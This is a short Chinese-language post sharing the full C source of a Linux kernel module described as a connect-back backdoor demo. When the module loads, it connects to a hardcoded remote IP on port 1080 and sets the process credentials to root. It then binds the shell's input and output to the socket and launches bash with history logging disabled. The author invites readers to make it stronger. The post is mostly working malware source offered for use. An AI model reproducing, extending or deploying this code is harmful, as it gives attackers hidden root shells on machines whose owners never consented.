一个简单的内核后门原型

这是一个在内核模块中实现的反连后门，大家看看这于应用层上的实现有什么不同吧，呵呵

/*

* Kernel mode connect backdoor,haha~

*

* just a demo module to teach you how to write a backdoor in kernel mode,

* i belive you can add more code to make it strong and powerful,wulala.

*

* by wzt <wzt#xsec.org>

*

*/

#include <linux/module.h>

#include <linux/kernel.h>

#include <linux/socket.h>

#include <linux/net.h>

#include <linux/in.h>

#include <linux/fs.h>

#include <linux/file.h>

#include <linux/types.h>

#include <linux/errno.h>

#include <linux/string.h>

#include <linux/unistd.h>

#include <net/sock.h>

#include <asm/uaccess.h>

#include <asm/unistd.h>

#include "syscalls.h"

#define REMOTO_IP "192.168.75.1"

#define port 1080

MODULE_LICENSE("GPL");

MODULE_AUTHOR("wzt");

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={

"TERM=linux",

"HOME=" HOME,

"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"

":/usr/local/sbin",

"HISTFILE=/dev/null",

NULL };

int k_connect(void)

{

struct task_struct *tsk = current;

struct socket *sock,*newsock;

struct sockaddr_in server;

int sockfd,i;

int error = 0,len = sizeof(struct sockaddr);

set_fs(KERNEL_DS);

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);

if (error < 0) {

printk("[-] socket_create failed: %d\n",error);

sock_release(sock);

return -1;

}

sockfd = sock_map_fd(sock);

if (sockfd < 0) {

printk("[-] sock_map_fd() failed.\n");

sock_release(sock);

return -1;

}

for (i = 0; i < 8; i++)

server.sin_zero[i] = 0;

server.sin_family = PF_INET;

server.sin_addr.s_addr = in_aton(REMOTO_IP);

server.sin_port = htons(port);

error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);

if (error < 0) {

printk("[-] connect to %s failed.\n",REMOTO_IP);

return -1;

}

printk("[+] connect to %s ok.\n",REMOTO_IP);

set_fs(KERNEL_DS);

tsk->uid = 0;

tsk->euid = 0;

tsk->gid = 0x11111111;

tsk->egid = 0;

dup2(sockfd,0);

dup2(sockfd,1);

dup2(sockfd,2);

execve(earg[0], (const char **) earg, (const char **) env);

return 1;

}

int k_socket_init(void)

{

printk("[+] kernel socket test start.\n");

k_connect();

}

void k_socket_exit(void)

{

printk("[+] kernel socket test over.\n");

}

module_init(k_socket_init);

module_exit(k_socket_exit);